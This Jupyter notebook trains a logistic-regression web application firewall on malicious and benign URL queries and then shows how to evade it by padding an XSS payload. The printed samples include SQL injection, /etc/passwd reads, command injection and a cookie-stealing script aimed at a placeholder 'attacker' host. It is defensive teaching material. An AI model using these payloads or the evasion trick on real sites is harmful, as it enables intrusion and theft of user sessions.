# Machine Learning WAF - Web Application Firewall
* https://github.com/faizann24/Fwaf-Machine-Learning-driven-Web-Application-Firewall
* https://github.com/oreilly-mlsec/book-resources/tree/master/chapter8/waf

In [65]:
import os, urllib.parse, pickle
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn import metrics

import matplotlib.pyplot as plt

In [41]:
def loadFile(name):
    directory = str(os.getcwd())
    filepath = os.path.join(directory, name)
    with open(filepath, 'r', encoding='utf-8') as f:
        data = f.readlines()
    data = list(set(data))
    result = []
    for d in data:
        d = str(urllib.parse.unquote(d))   #converting url encoded data to simple string
        result.append(d)
    return result

In [45]:
badQueries = loadFile('badqueries.txt')
badQueries[:10]

["/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --\n",
 '/examples/jsp/colors/way-board/way-board.cgi?db=/etc/passwd\\x00\n',
 '/javascript/statement.exe\n',
 '"| [ 6 -ne $(echo YPWXZB | tr -d \'\\n\' | wc -c) ] || sleep 1 \\\\\n',
 '/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1284503405--\n',
 ';echo FMKLWP$((66+12))$(echo FMKLWP)FMKLWP"\n',
 '/bin/sensepost.exe?/c+dir\n',
 "/scripts/starnet/addons/slideshow_full.php?album_name='648730541\n",
 '/en-us/account/phf?qalias=x\\x0a/bin/cat /etc/passwd\n',
 '/egaet53a.htm?<script>cross_site_scripting.nasl</script>\n']

In [46]:
validQueries = loadFile('goodqueries.txt')
validQueries[:10]

['/gtalk2voip_comb/\n',
 '/image0281165316760426/\n',
 '/mini-golf/\n',
 '/punk-plaids/\n',
 '/2536111680090657345ktiyid/\n',
 '/168000t321/\n',
 '/41251000/\n',
 '/oa_html/\n',
 '/iso-grk2/\n',
 '/acidburn_mizcrackme2/\n']

In [47]:
badQueries = list(set(badQueries))
validQueries = list(set(validQueries))
allQueries = badQueries + validQueries

In [48]:
yBad = [1 for i in range(0, len(badQueries))]  #labels, 1 for malicious and 0 for clean
yGood = [0 for i in range(0, len(validQueries))]
y = yBad + yGood
queries = allQueries

In [49]:
vectorizer = TfidfVectorizer(min_df = 0.0, analyzer="char", sublinear_tf=True, ngram_range=(1,3)) # converting data to vectors
X = vectorizer.fit_transform(queries)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) # splitting data

badCount = len(badQueries)
validCount = len(validQueries)

lgs = LogisticRegression(class_weight={1: 2 * validCount / badCount, 0: 1.0}) # class_weight='balanced')
lgs.fit(X_train, y_train) # training our model



LogisticRegression(C=1.0, class_weight={1: 56.856822060540736, 0: 1.0},
          dual=False, fit_intercept=True, intercept_scaling=1,
          max_iter=100, multi_class='warn', n_jobs=None, penalty='l2',
          random_state=None, solver='warn', tol=0.0001, verbose=0,
          warm_start=False)

## Pickle model

In [50]:
p = Pipeline([
        ('vectorizer', vectorizer),
        ('classifier', lgs)
    ])

pickle.dump(p, open('trained_waf_model', 'wb'))

## Evaluation

In [51]:
predicted = lgs.predict(X_test)

fpr, tpr, _ = metrics.roc_curve(y_test, (lgs.predict_proba(X_test)[:, 1]))
auc = metrics.auc(fpr, tpr)

print("Bad samples: %d" % badCount)
print("Good samples: %d" % validCount)
print("Baseline Constant negative: %.6f" % (validCount / (validCount + badCount)))
print("------------")
print("Accuracy: %f" % lgs.score(X_test, y_test))  #checking the accuracy
print("Precision: %f" % metrics.precision_score(y_test, predicted))
print("Recall: %f" % metrics.recall_score(y_test, predicted))
print("F1-Score: %f" % metrics.f1_score(y_test, predicted))
print("AUC: %f" % auc)

Bad samples: 44532
Good samples: 1265974
Baseline Constant negative: 0.966019
------------
Accuracy: 0.999420
Precision: 0.984621
Recall: 0.998293
F1-Score: 0.991410
AUC: 0.999875


## Use pretrained model

In [52]:
p = pickle.load(open('trained_waf_model', 'rb'))

In [55]:
input_data = [
    '<script></script>',
    'hello.us',
    'www.google.com',
    "<script>window.location='http://attacker/?cookie='+document.cookie</script>"
]

pred = p.predict_proba(input_data).tolist()

for i in range(len(pred)):
    print("{:0.2f}%\tmalicious:\t{}".format(pred[i][1]*100, input_data[i]))

100.00%	malicious:	<script></script>
8.01%	malicious:	hello.us
9.77%	malicious:	www.google.com
100.00%	malicious:	<script>window.location='http://attacker/?cookie='+document.cookie</script>


## Binary classifier evasion

In [57]:
vars(p)

{'steps': [('vectorizer',
   TfidfVectorizer(analyzer='char', binary=False, decode_error='strict',
           dtype=<class 'numpy.float64'>, encoding='utf-8', input='content',
           lowercase=True, max_df=1.0, max_features=None, min_df=0.0,
           ngram_range=(1, 3), norm='l2', preprocessor=None, smooth_idf=True,
           stop_words=None, strip_accents=None, sublinear_tf=True,
           token_pattern='(?u)\\b\\w\\w+\\b', tokenizer=None, use_idf=True,
           vocabulary=None)),
  ('classifier',
   LogisticRegression(C=1.0, class_weight={1: 56.856822060540736, 0: 1.0},
             dual=False, fit_intercept=True, intercept_scaling=1,
             max_iter=100, multi_class='warn', n_jobs=None, penalty='l2',
             random_state=None, solver='warn', tol=0.0001, verbose=0,
             warm_start=False))],
 'memory': None}

In [59]:
vec = p.steps[0][1]
clf = p.steps[1][1]

In [60]:
print(vec.idf_)

[ 9.88191796 13.29416517 13.98731235 ... 14.39277746 14.39277746
 14.39277746]


In [61]:
print(clf.coef_)

[[5.39658615e+00 2.21982409e-02 8.76872925e-04 ... 2.06472496e-06
  2.06472496e-06 2.06472496e-06]]


In [62]:
term_influence = vec.idf_ * clf.coef_
print(term_influence)

[[5.33286215e+01 2.95107081e-01 1.22650955e-02 ... 2.97171269e-05
  2.97171269e-05 2.97171269e-05]]


In [66]:
print(np.argpartition(term_influence, 1))

[[81937 83662     2 ... 97829 97830 97831]]


In [69]:
vec.vocabulary_

{'/': 10522,
 'i': 57223,
 'n': 67925,
 'd': 45818,
 'e': 48183,
 'x': 90144,
 '.': 9860,
 'p': 72543,
 'h': 55125,
 '?': 35512,
 'm': 65680,
 'o': 70279,
 'u': 84107,
 'l': 63324,
 '=': 33946,
 't': 81489,
 'c': 43527,
 's': 79024,
 '&': 4002,
 'f': 50796,
 'v': 86105,
 'w': 88122,
 '-': 8262,
 '1': 14970,
 ' ': 348,
 ',': 7838,
 "'": 4414,
 'r': 76641,
 '_': 37164,
 'q': 74786,
 'j': 59431,
 'a': 38945,
 '3': 19195,
 '9': 30764,
 '0': 12808,
 '5': 23159,
 '2': 17153,
 '\n': 154,
 '/i': 11921,
 'in': 58725,
 'nd': 69053,
 'de': 47041,
 'ex': 50609,
 'x.': 90372,
 '.p': 10368,
 'ph': 73803,
 'hp': 56669,
 'p?': 73318,
 '?m': 35860,
 'mo': 67318,
 'od': 71269,
 'du': 47852,
 'ul': 85326,
 'le': 64518,
 'e=': 49103,
 '=t': 34914,
 'to': 83431,
 'op': 71937,
 'pi': 73851,
 'ic': 58119,
 'cs': 45384,
 's&': 79165,
 '&f': 4203,
 'fu': 52656,
 'un': 85433,
 'nc': 69001,
 'c=': 44293,
 '=v': 34934,
 'vi': 87253,
 'ie': 58240,
 'ew': 50550,
 'w&': 88198,
 '&t': 4357,
 'ci': 44873,
 'id': 58174

In [70]:
# First, we create a token vocabulary dictionary so that
# we can access tokens by index.
vocab = dict([(v,k) for k,v in vec.vocabulary_.items()])

In [71]:
term_idx = np.argpartition(term_influence, 1)[0][0]

In [72]:
print(vocab[term_idx])

t/s


In [73]:
payload = "<script>alert(1)</script>"

In [74]:
p.predict([payload])[0]

1

In [75]:
p.predict_proba([payload])[0]

array([3.61493058e-11, 1.00000000e+00])

In [76]:
p.predict_proba([payload + '/' + vocab[term_idx]])[0]

array([1.04162404e-08, 9.99999990e-01])

In [113]:
# Find the multiplier value at which the classifier will start making errors
multiplier = 100

In [114]:
p.predict_proba([payload + '/' + vocab[term_idx]*multiplier])[0]

array([0.21649542, 0.78350458])

In [115]:
p.predict([payload + '/' + vocab[term_idx]*multiplier])[0]

1

In [116]:
print(payload + '/' + vocab[term_idx]*multiplier)

<script>alert(1)</script>/t/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/s
